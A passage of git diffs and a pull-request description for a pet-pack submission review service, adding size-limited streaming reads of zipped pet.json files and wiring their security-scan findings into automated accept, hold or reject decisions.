-          zipPetJson = JSON.parse(raw);
+        const zipped = await readZipPetJson(
+          archive.files[petJsonNames[0]],
+          MAX_ASSET_BYTES,
+        );
+        if (zipped.ok) {
+          zipPetJson = zipped.petJson;
           hasZipPetJson = true;
-        } catch {
-          reasons.push("zip pet.json could not be parsed as JSON.");
+        } else {
+          reasons.push(zipped.reason);
         }
       }
       const basenames = new Set(names.map((name) => name.split("/").pop()));
@@ -1228,6 +1231,43 @@ function sha256(buffer: Buffer): string {
 
 function hasUnsafeZipPath(name: string): boolean {
   return name.startsWith("/") || name.split("/").includes("..");
+}
+
+type ZipEntryWithData = JSZip.JSZipObject & {
+  _data?: { uncompressedSize?: unknown };
+};
+
+async function readZipPetJson(
+  entry: JSZip.JSZipObject,
+  maxBytes: number,
+): Promise<{ ok: true; petJson: unknown } | { ok: false; reason: string }> {
+  const size = zipEntryUncompressedSize(entry);
+  if (size === null) {
+    return { ok: false, reason: "zip pet.json size could not be verified." };
+  }
+  if (size > maxBytes) {
+    return {
+      ok: false,
+      reason: "zip pet.json exceeds the maximum allowed size.",
+    };
+  }
+  try {
+    const bytes = Buffer.from(await entry.async("uint8array"));
+    if (bytes.byteLength > maxBytes) {
+      return {
+        ok: false,
+        reason: "zip pet.json exceeds the maximum allowed size.",
+      };
+    }
+    return { ok: true, petJson: JSON.parse(bytes.toString("utf8")) };
+  } catch {
+    return { ok: false, reason: "zip pet.json could not be parsed as JSON." };
+  }
+}
+
+function zipEntryUncompressedSize(entry: JSZip.JSZipObject): number | null {
+  const size = (entry as ZipEntryWithData)._data?.uncompressedSize;
+  return typeof size === "number" && Number.isFinite(size) ? size : null;
 }
 
 function normalizeText(value: string): string {

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -12,7 +12,7 @@ import {
   embedTextValue,
   PETDEX_EMBEDDING_MODEL,
 } from "@/lib/embeddings";
-import { scanPetManifestsSecurity } from "@/lib/pet-security";
+import { scanPetManifestsSecurity, scanPetSecurity } from "@/lib/pet-security";
 import { decideAutomatedReview } from "@/lib/submission-review-decision";
 import { preparePolicyReviewImage } from "@/lib/submission-review-image";
 import {
@@ -68,6 +68,11 @@ type AssetAnalysis = {
   spriteBuffer: Buffer | null;
   petJson: unknown;
   dhash: string | null;
+};
+
+type ZipPetJson = {
+  name: string;
+  petJson: unknown;
 };
 
 type VisualMatchScan = {
@@ -204,6 +209,7 @@ export async function reviewSubmission(
             actor: "auto-review",
             db,
             skipSideEffects: process.env.PETDEX_REVIEW_DB === "runtime",
+            skipNotifications: process.env.PETDEX_REVIEW_DB === "runtime",
           },
         );
         applied = actionResult.ok;
@@ -363,8 +369,7 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
     }
   }
 
-  let zipPetJson: unknown;
-  let hasZipPetJson = false;
+  const zipPetJsons: ZipPetJson[] = [];
   if (zip.ok) {
     try {
       const archive = await JSZip.loadAsync(zip.buffer);
@@ -385,15 +390,16 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
         if (petJsonNames.length > 1) {
           reasons.push("zip contains multiple pet.json files.");
         }
-        const zipped = await readZipPetJson(
-          archive.files[petJsonNames[0]],
-          MAX_ASSET_BYTES,
-        );
-        if (zipped.ok) {
-          zipPetJson = zipped.petJson;
-          hasZipPetJson = true;
-        } else {
-          reasons.push(zipped.reason);
+        for (const name of petJsonNames) {
+          const zipped = await readZipPetJson(
+            archive.files[name],
+            MAX_ASSET_BYTES,
+          );
+          if (zipped.ok) {
+            zipPetJsons.push({ name, petJson: zipped.petJson });
+          } else {
+            reasons.push(`zip ${name}: ${zipped.reason}`);
+          }
         }
       }
       const basenames = new Set(names.map((name) => name.split("/").pop()));
@@ -437,10 +443,13 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
   };
   const security = scanPetManifestsSecurity({
     petJson: parsedJson,
-    zipPetJson: hasZipPetJson ? zipPetJson : undefined,
+    zipPetJson: zipPetJsons[0]?.petJson,
     displayName: row.displayName,
     description: row.description,
   });
+  for (const entry of zipPetJsons.slice(1)) {
+    appendZipPetJsonSecurity(security, entry);
+  }
 
   return {
     check: {
@@ -453,6 +462,28 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
     petJson: parsedJson,
     dhash,
   };
+}
+
+function appendZipPetJsonSecurity(
+  security: NonNullable<ReviewChecks["security"]>,
+  entry: ZipPetJson,
+) {
+  const entryScan = scanPetSecurity({ petJson: entry.petJson });
+  security.findings.push(
+    ...entryScan.findings.map((finding) => ({
+      ...finding,
+      path: `zip.petJson[${entry.name}]${finding.path === "$" ? "" : finding.path.startsWith("$") ? finding.path.slice(1) : `.${finding.path}`}`,
+    })),
+  );
+  security.reasons.push(
+    ...entryScan.findings.map(
+      (finding) => `zip ${entry.name}: ${finding.code}: ${finding.evidence}`,
+    ),
+  );
+  if (entryScan.decision === "fail") security.decision = "fail";
+  if (security.decision === "pass" && entryScan.decision === "hold") {
+    security.decision = "hold";
+  }
 }
 
 async function analyzePolicy(

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -182,8 +182,7 @@ export async function reviewSubmission(
             ? { action: "approve" }
             : {
                 action: "reject",
-                reason:
-                  "This submission appears to duplicate an existing pet pack. If you believe this is incorrect, contact support with the submission ID.",
+                reason: rejectionReasonForDecision(decision),
               },
           {
             actor: "auto-review",
@@ -317,6 +316,14 @@ async function finishReview(
     throw new Error(`review ${reviewId} disappeared before completion`);
   }
   return { review, applied: args.applied };
+}
+
+function rejectionReasonForDecision(decision: {
+  reasonCode: string;
+  summary: string;
+}): string {
+  if (decision.reasonCode.startsWith("security_")) return decision.summary;
+  return "This submission appears to duplicate an existing pet pack. If you believe this is incorrect, contact support with the submission ID.";
 }
 
 async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -1,4 +1,5 @@
 import { createHash } from "node:crypto";
+import type { Readable } from "node:stream";
 
 import { generateText } from "ai";
 import { and, desc, eq, isNotNull, ne } from "drizzle-orm";
@@ -1317,18 +1318,54 @@ async function readZipPetJson(
       reason: "zip pet.json exceeds the maximum allowed size.",
     };
   }
+  const streamed = await readZipEntryBuffer(
+    entry,
+    maxBytes,
+    "zip pet.json exceeds the maximum allowed size.",
+  );
+  if (!streamed.ok) return streamed;
   try {
-    const bytes = Buffer.from(await entry.async("uint8array"));
-    if (bytes.byteLength > maxBytes) {
-      return {
-        ok: false,
-        reason: "zip pet.json exceeds the maximum allowed size.",
-      };
-    }
+    const bytes = streamed.buffer;
     return { ok: true, petJson: JSON.parse(bytes.toString("utf8")) };
   } catch {
     return { ok: false, reason: "zip pet.json could not be parsed as JSON." };
   }
+}
+
+function readZipEntryBuffer(
+  entry: JSZip.JSZipObject,
+  maxBytes: number,
+  sizeReason: string,
+): Promise<{ ok: true; buffer: Buffer } | { ok: false; reason: string }> {
+  return new Promise((resolve) => {
+    const stream = entry.nodeStream("nodebuffer") as Readable;
+    const chunks: Buffer[] = [];
+    let total = 0;
+    let settled = false;
+    const finish = (
+      result: { ok: true; buffer: Buffer } | { ok: false; reason: string },
+    ) => {
+      if (settled) return;
+      settled = true;
+      resolve(result);
+    };
+    stream.on("data", (chunk) => {
+      const buffer = Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk);
+      total += buffer.byteLength;
+      if (total > maxBytes) {
+        stream.destroy();
+        finish({ ok: false, reason: sizeReason });
+        return;
+      }
+      chunks.push(buffer);
+    });
+    stream.on("error", () => {
+      finish({ ok: false, reason: "zip pet.json could not be read." });
+    });
+    stream.on("end", () => {
+      finish({ ok: true, buffer: Buffer.concat(chunks, total) });
+    });
+  });
 }
 
 function zipEntryUncompressedSize(entry: JSZip.JSZipObject): number | null {

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -148,10 +148,26 @@ export async function reviewSubmission(
     const assets = await analyzeAssets(row);
     await persistAssetSignals(row.id, assets);
 
-    const [policy, duplicates] = await Promise.all([
-      analyzePolicy(row, assets),
-      analyzeDuplicates(row, assets),
-    ]);
+    let policy: ReviewChecks["policy"] = {
+      decision: "hold",
+      confidence: 0,
+      reasons: ["Skipped because security review failed."],
+      flags: [],
+    };
+    let duplicates: ReviewChecks["duplicates"] = {
+      decision: "hold",
+      reasons: ["Skipped because security review failed."],
+      exactMatches: [],
+      visualMatches: [],
+      semanticMatches: [],
+      metadataMatches: [],
+    };
+    if (assets.security?.decision !== "fail") {
+      [policy, duplicates] = await Promise.all([
+        analyzePolicy(row, assets),
+        analyzeDuplicates(row, assets),
+      ]);
+    }
 
     checks = {
       security: assets.security,

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -12,7 +12,11 @@ import {
   embedTextValue,
   PETDEX_EMBEDDING_MODEL,
 } from "@/lib/embeddings";
-import { scanPetManifestsSecurity, scanPetSecurity } from "@/lib/pet-security";
+import {
+  petSecurityPathSegment,
+  scanPetManifestsSecurity,
+  scanPetSecurity,
+} from "@/lib/pet-security";
 import { decideAutomatedReview } from "@/lib/submission-review-decision";
 import { preparePolicyReviewImage } from "@/lib/submission-review-image";
 import {
@@ -483,15 +487,16 @@ function appendZipPetJsonSecurity(
   entry: ZipPetJson,
 ) {
   const entryScan = scanPetSecurity({ petJson: entry.petJson });
+  const entryName = petSecurityPathSegment(entry.name);
   security.findings.push(
     ...entryScan.findings.map((finding) => ({
       ...finding,
-      path: `zip.petJson[${entry.name}]${finding.path === "$" ? "" : finding.path.startsWith("$") ? finding.path.slice(1) : `.${finding.path}`}`,
+      path: `zip.petJson[${JSON.stringify(entryName)}]${finding.path === "$" ? "" : finding.path.startsWith("$") ? finding.path.slice(1) : `.${finding.path}`}`,
     })),
   );
   security.reasons.push(
     ...entryScan.findings.map(
-      (finding) => `zip ${entry.name}: ${finding.code}: ${finding.evidence}`,
+      (finding) => `zip ${entryName}: ${finding.code}: ${finding.evidence}`,
     ),
   );
   if (entryScan.decision === "fail") security.decision = "fail";


### PR DESCRIPTION
## Summary
- add deterministic pet metadata security scanning for command payloads, script URLs, credential references, unsafe paths, and suspicious external URLs
- wire security findings into submission review so high-confidence payloads auto-reject and suspicious findings hold for manual review
- add an admin audit script for approved/public pets with dry-run, manifest mode, retries, and optional apply mode

## Verification
- bun test src/lib/pet-security.test.ts src/lib/submission-review.test.ts
- bunx biome check src/lib/pet-security.ts src/lib/pet-security.test.ts src/lib/submission-review.ts src/lib/submission-review-decision.ts src/lib/submission-review-types.ts src/lib/submission-review.test.ts src/components/admin-review-row.tsx src/i18n/messages/en.json src/i18n/messages/es.json src/i18n/messages/zh.json scripts/audit-pet-security.ts
- bun run i18n:check
- git diff --check
- bun scripts/audit-pet-security.ts --public --retries 0 --json | jq '{total, counts, fail, hold}'

Public audit result: total=2283, fail=0, hold=3, error=1659. Errors were pet.json fetch failures from R2 rate limiting, but manifest display names still scanned with zero fail.